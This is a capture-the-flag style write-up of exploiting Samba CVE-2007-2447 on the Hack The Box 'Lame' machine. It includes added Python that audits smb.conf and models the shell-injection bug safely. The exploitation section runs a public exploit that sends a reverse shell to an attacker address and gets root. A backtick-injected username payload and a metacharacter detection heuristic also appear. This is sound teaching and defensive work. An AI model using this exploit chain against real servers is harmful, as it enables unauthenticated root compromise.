CVE-2007-2447
A vulnerability was found in Samba 3.0.0 through 3.0.25rc3 (file sharing software). It has been rated as critical. This issue affects the MS-RPC function
SamrChangePassword
when the username map script option is set in smb.conf. The username supplied by the client during authentication is interpolated into the script's command line and handed to /bin/sh without adequate escaping, so shell metacharacters in the username lead to remote command execution, with no valid credentials required. The CWE attached to the advisory is CWE-269: the software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. The root cause, however, is shell command injection, and the injected command runs with the privileges of smbd itself. Impacted is confidentiality, integrity, and availability.
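As an added example (written for this writeup, not code from the original page or from Samba), the following Python audits an smb.conf for the username map script setting that exposes a Samba 3.0.0 through 3.0.25rc3 server to this bug. The two sample configurations, the script path in them and the share names are constructed for the example; a static username map file is deliberately included to show that it is a different, safe option and must not be flagged.

```python
# Added example (not part of the original writeup or of Samba): a small
# smb.conf auditor that reports whether "username map script" is set, the
# precondition for the unauthenticated path of CVE-2007-2447. Paths and the
# sample configs below are constructed for illustration.
import re
from typing import Dict, Optional

# Constructed sample: the vulnerable setting. The script path is made up.
VULNERABLE_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   username map script = /etc/samba/scripts/mapusers.sh
   ; a static map file is a different, safe option
   username map = /etc/samba/smbusers

[tmp]
   path = /tmp
   writable = yes
"""

# Constructed sample: same server with the script option removed.
HARDENED_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   # static mappings only; no shell command is ever run with a client-supplied name
   username map = /etc/samba/smbusers

[tmp]
   path = /tmp
   writable = yes
"""

def normalize_param(name: str) -> str:
    """Samba compares parameter names case-insensitively and ignores
    whitespace, so 'User Name Map Script' == 'usernamemapscript'."""
    return re.sub(r"\s+", "", name).lower()

def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal smb.conf parser: [section] headers, 'name = value' lines,
    '#' or ';' comment lines. Good enough for auditing; not a full
    replacement for Samba's own loader (no 'include', no line continuations)."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        sections[current][normalize_param(name)] = value.strip()
    return sections

def username_map_script(text: str) -> Optional[str]:
    """Return the configured 'username map script' command, or None if the
    server never runs a script with a client-supplied username."""
    return parse_smb_conf(text).get("global", {}).get("usernamemapscript")

def audit(text: str) -> str:
    script = username_map_script(text)
    if script:
        return ("VULNERABLE precondition: username map script = %s "
                "(client-controlled usernames reach /bin/sh on Samba 3.0.0-3.0.25rc3)" % script)
    return "OK: no username map script configured"

if __name__ == "__main__":
    for label, conf in (("vulnerable", VULNERABLE_CONF), ("hardened", HARDENED_CONF)):
        print("%-10s %s" % (label, audit(conf)))
```

Run it against a real /etc/samba/smb.conf by reading the file into audit(); the setting only matters on the affected 3.0.x releases, but finding it on any server is worth a second look because whatever script it points at still receives an attacker-chosen string.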
Exploit
I found an exploit online
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ python2 CVE-2007-2447.py $IP 445 10.10.14.2 9999
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
Launching the exploit
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.3] 45106
whoami
root
hostname
lame
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:b0:52
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:b052/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:b052/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:357094 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2900 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:26645106 (25.4 MB)  TX bytes:436235 (426.0 KB)
          Interrupt:19 Base address:0x2024

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:512 errors:0 dropped:0 overruns:0 frame:0
          TX packets:512 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:228769 (223.4 KB)  TX bytes:228769 (223.4 KB)
Initial foothold established on the target system as the root user.
The Samba service was running as root all along. smbd needs root so that it can switch to the identity of the authenticating user, but the username map script is executed during authentication, before that switch happens, so anything injected through it runs as root. A command-injection bug on that code path is therefore an immediate full compromise with no privilege escalation step needed. Such a dangerous practice.
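To show why a crafted username turns into commands, here is an added Python model of the vulnerable code path, written for this writeup rather than taken from Samba's source: one function builds the map-script command line the way the unpatched server did (username interpolated into a string handed to /bin/sh), the other passes the username as a separate argv element. /bin/echo stands in for the mapping script, and the backtick payload is constructed to print a marker instead of spawning a reverse shell; the exact string Samba used to build its command is an assumption, only the shape matters.

```python
# Added example (not part of the original writeup or of Samba's source): a
# model of how smbd handed the client-supplied username to the map script,
# to show why a username containing backticks executes commands. The
# "script" here is /bin/echo standing in for a real mapping script; the
# command-line construction approximates Samba's, it is not its code.
import shlex
import subprocess

# Constructed payload in the shape the public exploit uses: the part inside
# the backticks is what the server ends up executing. A real attack puts a
# reverse shell there; this one just prints a marker.
PAYLOAD_USERNAME = "/=`echo INJECTED`"
BENIGN_USERNAME = "alice"

def run_map_script_vulnerable(script: str, username: str) -> str:
    """Vulnerable pattern: build one command string and hand it to /bin/sh.
    Double quotes do not stop `...` or $(...) substitution, so any shell
    metacharacters in the username run on the server (as root, because smbd
    executes the map script before switching to the user's identity)."""
    command = '%s "%s"' % (script, username)
    proc = subprocess.run(["/bin/sh", "-c", command],
                          capture_output=True, text=True, check=False)
    return proc.stdout

def run_map_script_safe(script: str, username: str) -> str:
    """Hardened pattern: no shell in the path. The script and its static
    arguments are split once, the username is appended as a single argv
    element, and the kernel delivers it verbatim to the script."""
    argv = shlex.split(script) + [username]
    proc = subprocess.run(argv, capture_output=True, text=True, check=False)
    return proc.stdout

def looks_injected(username: str) -> bool:
    """Cheap heuristic for log review: SMB usernames never legitimately
    contain shell metacharacters, so their presence in an auth attempt is a
    strong indicator of this attack."""
    return any(ch in username for ch in "`$|;&<>(){}\n")

if __name__ == "__main__":
    script = "/bin/echo"
    print("vulnerable:", repr(run_map_script_vulnerable(script, PAYLOAD_USERNAME)))
    print("safe:      ", repr(run_map_script_safe(script, PAYLOAD_USERNAME)))
    print("flagged:   ", looks_injected(PAYLOAD_USERNAME), looks_injected(BENIGN_USERNAME))
```

In the vulnerable function the marker comes back as "/=INJECTED": the shell ran the embedded command before echo ever saw its argument. In the safe function the username arrives literally, backticks and all. Escaping the username before building the command string also closes this particular hole, but keeping the shell out of the path removes the whole class of bug.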
System Level Compromise